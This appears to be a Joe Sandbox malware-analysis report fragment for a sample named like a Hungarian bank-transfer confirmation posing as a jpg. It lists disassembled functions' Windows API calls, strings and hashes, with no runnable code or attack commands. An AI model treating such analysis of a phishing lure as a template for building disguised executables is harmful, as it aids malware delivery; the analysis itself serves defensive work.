                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                          • API String ID: 1976180769-4113822522
                                                                                                          • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                          • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                                                          • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                          • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                                                          • String ID:
                                                                                                          • API String ID: 461458858-0
                                                                                                          • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                          • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                                                          • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                          • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                                                          • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                                                          • DeleteObject.GDI32(?), ref: 004301D0
                                                                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                          • String ID:
                                                                                                          • API String ID: 3969911579-0
                                                                                                          • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                          • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                                                          • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                          • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 956284711-4108050209
                                                                                                          • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                          • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                                                          • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                          • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                          • String ID: 0.0.0.0
                                                                                                          • API String ID: 1965227024-3771769585
                                                                                                          • Opcode ID: 3769f90e7891a7f45cae943bdf4bb8482844758e4de513001ef727f9f6023d4a
                                                                                                          • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                                                          • Opcode Fuzzy Hash: 3769f90e7891a7f45cae943bdf4bb8482844758e4de513001ef727f9f6023d4a
                                                                                                          • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                                                          APIs
                                                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: SendString$_memmove_wcslen
                                                                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                          • API String ID: 369157077-1007645807
                                                                                                          • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                          • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                                                          • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                          • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                                                          APIs
                                                                                                          • GetParent.USER32 ref: 00445BF8
                                                                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                                                          • __wcsicoll.LIBCMT ref: 00445C33
                                                                                                          • __wcsicoll.LIBCMT ref: 00445C4F
                                                                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                          • API String ID: 3125838495-3381328864
                                                                                                          • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                          • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                                                          • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                          • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                                                          • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                                                          • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                                                          • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                                                          • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$CharNext
                                                                                                          • String ID:
                                                                                                          • API String ID: 1350042424-0
                                                                                                          • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                          • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                                                          • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                          • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                                                          APIs
                                                                                                            • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                            • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                          • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                                                          • _wcscpy.LIBCMT ref: 004787E5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                                          • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                          • API String ID: 3052893215-2127371420
                                                                                                          • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                          • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                                                          • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                          • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                                                          APIs
                                                                                                          • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                                                          • __swprintf.LIBCMT ref: 0045E7F7
                                                                                                          • _wprintf.LIBCMT ref: 0045E8B3
                                                                                                          • _wprintf.LIBCMT ref: 0045E8D7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                          • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                          • API String ID: 2295938435-2354261254
                                                                                                          • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                          • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                                                          • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                          • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                                                          • String ID: %.15g$0x%p$False$True
                                                                                                          • API String ID: 3038501623-2263619337
                                                                                                          • Opcode ID: ae3af1561c0bf2b56ac7df6aaaed7414d93e467e0ef5a85da2365562e19c9239
                                                                                                          • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                                                          • Opcode Fuzzy Hash: ae3af1561c0bf2b56ac7df6aaaed7414d93e467e0ef5a85da2365562e19c9239
                                                                                                          • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                                                                          APIs
                                                                                                          • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                                                          • __swprintf.LIBCMT ref: 0045E5F6
                                                                                                          • _wprintf.LIBCMT ref: 0045E6A3
                                                                                                          • _wprintf.LIBCMT ref: 0045E6C7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                          • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                          • API String ID: 2295938435-8599901
                                                                                                          • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                          • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                                                          • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                          • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                                                          APIs
                                                                                                          • timeGetTime.WINMM ref: 00443B67
                                                                                                            • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                                                          • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                                                                                                          • SetActiveWindow.USER32(00000000), ref: 00443BEC
                                                                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                                                          • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                                                                                                          • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                                                          • IsWindow.USER32(00000000), ref: 00443C3A
                                                                                                          • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                                                                                            • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                            • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                            • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                          • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                                                          • String ID: BUTTON
